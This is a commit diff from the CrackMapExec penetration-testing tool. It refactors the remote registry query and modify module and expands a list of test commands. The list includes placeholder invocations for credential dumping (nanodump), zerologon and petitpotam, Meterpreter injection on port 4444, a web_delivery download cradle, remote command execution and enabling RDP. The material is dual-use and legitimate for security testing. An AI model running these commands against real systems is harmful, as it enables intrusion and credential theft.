tests: update tests
parent
ac563f1b91
commit
7da0b71fa8
|
@ -7,21 +7,29 @@ from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
|
||||||
|
|
||||||
class CMEModule:
|
class CMEModule:
|
||||||
name = 'reg-query'
|
def __init__(self, context=None):
|
||||||
description = 'Performs a registry query on the machine'
|
self.delete = None
|
||||||
supported_protocols = ['smb']
|
self.type = None
|
||||||
opsec_safe = True
|
self.value = None
|
||||||
multiple_hosts = True
|
self.key = None
|
||||||
|
self.path = None
|
||||||
|
self.name = 'reg-query'
|
||||||
|
self.description = 'Performs a registry query on the machine'
|
||||||
|
self.supported_protocols = ['smb']
|
||||||
|
self.opsec_safe = True
|
||||||
|
self.multiple_hosts = True
|
||||||
|
self.context = context
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
PATH: Registry key path to query
|
PATH Registry key path to query
|
||||||
KEY: Registry key value to retrieve
|
KEY Registry key value to retrieve
|
||||||
VALUE Registry key value to set (only used for modification). Will add a new regitry key if use on registry key that does not already exist
|
VALUE Registry key value to set (only used for modification)
|
||||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ. Type supported : REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
Will add a new registry key if the registry key does not already exist
|
||||||
|
TYPE Type of registry to modify, add or delete. Default type : REG_SZ.
|
||||||
|
Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||||
DELETE If set to True, delete a registry key if it does exist
|
DELETE If set to True, delete a registry key if it does exist
|
||||||
'''
|
"""
|
||||||
|
|
||||||
self.context = context
|
self.context = context
|
||||||
self.path = None
|
self.path = None
|
||||||
self.key = None
|
self.key = None
|
||||||
|
@ -54,12 +62,12 @@ class CMEModule:
|
||||||
try :
|
try :
|
||||||
self.value = int(self.value)
|
self.value = int(self.value)
|
||||||
except:
|
except:
|
||||||
context.log.error("Invalid registry value type specified: %s" % self.value)
|
context.log.error(f"Invalid registry value type specified: {self.value}")
|
||||||
sys.exit(1)
|
return
|
||||||
if self.type in type_dict:
|
if self.type in type_dict:
|
||||||
self.type = type_dict[self.type]
|
self.type = type_dict[self.type]
|
||||||
else:
|
else:
|
||||||
context.log.error("Invalid registry value type specified: %s" % self.type)
|
context.log.error(f"Invalid registry value type specified: {self.type}")
|
||||||
return
|
return
|
||||||
else:
|
else:
|
||||||
self.type = 1
|
self.type = 1
|
||||||
|
@ -68,83 +76,114 @@ class CMEModule:
|
||||||
self.delete = True
|
self.delete = True
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
|
self.context = context
|
||||||
if not self.path:
|
if not self.path:
|
||||||
context.log.error("Please provide the path of the registry to query")
|
self.context.log.error("Please provide the path of the registry to query")
|
||||||
return
|
return
|
||||||
|
|
||||||
if not self.key:
|
if not self.key:
|
||||||
context.log.error("Please provide the registry key to query")
|
self.context.log.error("Please provide the registry key to query")
|
||||||
return
|
return
|
||||||
|
|
||||||
remoteOps = RemoteOperations(connection.conn, False)
|
remote_ops = RemoteOperations(connection.conn, False)
|
||||||
remoteOps.enableRegistry()
|
remote_ops.enableRegistry()
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
||||||
self.path = (self.path).replace('HKLM\\', '')
|
self.path = self.path.replace('HKLM\\', '')
|
||||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
||||||
self.path = (self.path).replace('HKCU\\', '')
|
self.path = self.path.replace('HKCU\\', '')
|
||||||
ans = rrp.hOpenCurrentUser(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
||||||
self.path = (self.path).replace('HKCR\\', '')
|
self.path = self.path.replace('HKCR\\', '')
|
||||||
ans = rrp.hOpenClassesRoot(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
context.log.error("Unsupported registry hive specified in path: %s" % self.path)
|
self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
|
||||||
return
|
return
|
||||||
|
|
||||||
regHandle = ans['phKey']
|
reg_handle = ans['phKey']
|
||||||
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, self.path)
|
ans = rrp.hBaseRegOpenKey(
|
||||||
keyHandle = ans['phkResult']
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
reg_handle,
|
||||||
|
self.path
|
||||||
|
)
|
||||||
|
key_handle = ans['phkResult']
|
||||||
|
|
||||||
if self.delete:
|
if self.delete:
|
||||||
# Delete registry
|
# Delete registry
|
||||||
try:
|
try:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
except:
|
except:
|
||||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||||
return
|
return
|
||||||
# Delete value
|
# Delete value
|
||||||
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
rrp.hBaseRegDeleteValue(
|
||||||
self.context.log.success('Registry key %s has been deleted successfully' % (self.key))
|
remote_ops._RemoteOperations__rrp,
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.success(f"Registry key {self.key} has been deleted successfully")
|
||||||
|
rrp.hBaseRegCloseKey(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle
|
||||||
|
)
|
||||||
|
|
||||||
if self.value is not None:
|
if self.value is not None:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
try:
|
try:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
self.context.log.highlight("Key %s exists with value %s" % (self.key, reg_value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
|
||||||
# Modification
|
# Modification
|
||||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
rrp.hBaseRegSetValue(
|
||||||
context.log.success("Key %s has been modified to %s" % (self.key, self.value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key,
|
||||||
|
self.type,
|
||||||
|
self.value
|
||||||
|
)
|
||||||
|
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
||||||
except:
|
except:
|
||||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
rrp.hBaseRegSetValue(
|
||||||
self.context.log.success("New Key %s has been added with value %s" % (self.key, self.value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
key_handle,
|
||||||
|
self.key,
|
||||||
|
self.type,
|
||||||
|
self.value
|
||||||
|
)
|
||||||
|
self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
|
||||||
|
rrp.hBaseRegCloseKey(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
# Query
|
# Query
|
||||||
try:
|
try:
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
context.log.highlight("%s: %s" % (self.key, reg_value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.highlight(f"{self.key}: {reg_value}")
|
||||||
except:
|
except:
|
||||||
if self.delete:
|
if self.delete:
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||||
return
|
return
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
|
||||||
|
|
||||||
except DCERPCException as e:
|
except DCERPCException as e:
|
||||||
#context.log.error("DCERPC Error while querying or modifying registry: %s" % e)
|
self.context.log.error(f"DCERPC Error while querying or modifying registry: {e}")
|
||||||
pass
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error("Error while querying or modifying registry: %s" % e)
|
self.context.log.error(f"Error while querying or modifying registry: {e}")
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
remoteOps.finish()
|
remote_ops.finish()
|
||||||
|
|
|
@ -1,3 +1,4 @@
|
||||||
|
##### SMB
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
||||||
|
@ -20,6 +21,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
||||||
|
##### SMB Modules
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
||||||
|
@ -58,7 +60,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
||||||
|
@ -122,8 +124,10 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
||||||
|
##### SMB Anonymous Auth
|
||||||
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
||||||
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
||||||
|
##### LDAP
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
||||||
|
@ -132,6 +136,7 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/o
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
||||||
|
##### LDAP Modules
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
||||||
|
@ -154,18 +159,27 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
|
##### WINRM
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS --laps
|
||||||
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
##### MSSQL
|
||||||
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
##### MSSQL Modules
|
||||||
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
||||||
|
# a bit janky, but we try to enable RDP before testing RDP
|
||||||
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||||
|
##### RDP
|
||||||
|
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
|
Loading…
Reference in New Issue